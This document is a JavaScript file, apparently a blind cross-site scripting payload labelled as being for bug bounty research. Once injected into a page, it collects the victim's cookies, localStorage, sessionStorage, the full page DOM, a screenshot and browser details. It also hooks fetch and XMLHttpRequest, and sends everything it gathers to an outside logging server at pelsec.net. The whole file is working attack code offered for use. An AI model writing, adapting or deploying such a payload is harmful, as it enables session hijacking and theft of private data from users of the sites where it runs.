// For bug bounty and security research purposes only. var r_Jn = {}; var script = document.createElement('script'); script.src = "https://cdnjs.cloudflare.com/ajax/libs/html2canvas/0.4.1/html2canvas.min.js"; document.head.appendChild(script); function checkIfHtml2CanvasIsLoaded() { if (typeof html2canvas === 'function') { runPayloadLogic(); } else { setTimeout(checkIfHtml2CanvasIsLoaded, 100); } } checkIfHtml2CanvasIsLoaded(); function runPayloadLogic() { function prs(t) { return void 0 !== t ? t : ""; } function getQueryParamFromScriptUrl(param) { try { const scripts = document.getElementsByTagName('script'); const currentScript = scripts[scripts.length - 1].src; const queryString = currentScript.split('?')[1] || ''; const params = new URLSearchParams(queryString); return params.get(param) || ''; } catch (e) { return ''; } } function x_po(t) { var r = new XMLHttpRequest(); r.open("POST", "https://pelsec.net/logger", true); r.setRequestHeader("Content-type", "text/plain"); const injectionUrl = encodeURIComponent(getQueryParamFromScriptUrl("iu")); const injectionPoint = encodeURIComponent(getQueryParamFromScriptUrl("ip")); r.setRequestHeader("X-XSS-Payload", getQueryParamFromScriptUrl("id")); r.setRequestHeader("X-Injection-Point", injectionPoint); r.setRequestHeader("X-Injection-Url", injectionUrl); r.onreadystatechange = function () { if (r.readyState == 4 && r.status) {} }; r.send(JSON.stringify(t)); } function captureRequestHeaders() { var headers = {}; const originalOpen = XMLHttpRequest.prototype.open; XMLHttpRequest.prototype.open = function(method, url) { this.addEventListener('send', function() { headers = this.getAllResponseHeaders(); }); originalOpen.apply(this, arguments); }; const originalFetch = window.fetch; window.fetch = function(input, init) { return originalFetch(input, init).then(function(response) { headers = response.headers; return response; }); }; return headers; } function x_PS() { try { r_Jn.uri = prs(location.toString()); } catch (t) { r_Jn.uri = ""; } try { r_Jn.cookies = prs(document.cookie); } catch (t) { r_Jn.cookies = ""; } try { r_Jn.referrer = prs(document.referrer); } catch (t) { r_Jn.referrer = ""; } try { r_Jn["user-agent"] = prs(navigator.userAgent); } catch (t) { r_Jn["user-agent"] = ""; } try { r_Jn.origin = prs(location.origin); } catch (t) { r_Jn.origin = ""; } try { var lang = navigator.language || navigator.userLanguage; r_Jn.lang = prs(lang); } catch (t) { r_Jn.lang = ""; } try { var canvas = document.createElement("canvas"), gl = canvas.getContext("webgl") || canvas.getContext("experimental-webgl"), debugInfo = gl.getExtension("webgl_debug_renderer_info"), renderer = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL); r_Jn.gpu = prs(renderer); } catch (t) { r_Jn.gpu = ""; } try { r_Jn.localstorage = window.localStorage; } catch (t) { r_Jn.localstorage = ""; } try { r_Jn.sessionstorage = window.sessionStorage; } catch (t) { r_Jn.sessionstorage = ""; } try { r_Jn.dom = prs(document.documentElement.outerHTML); } catch (t) { r_Jn.dom = ""; } html2canvas(document.body, { onrendered: function(canvas) { var screenshotBase64 = canvas.toDataURL("image/png"); r_Jn.screenshot = screenshotBase64; r_Jn.headers = captureRequestHeaders(); setTimeout(() => { a(); }, 2000); } }); } function a() { o_js(); x_po(r_Jn); } function j_ls(t, r, e) { t.addEventListener ? t.addEventListener(r, e, false) : t.attachEvent && t.attachEvent("on" + r, e); } function o_js() {} if (document.readyState === "complete") { x_PS(); } else { j_ls(window, "load", function () { x_PS(); }); } }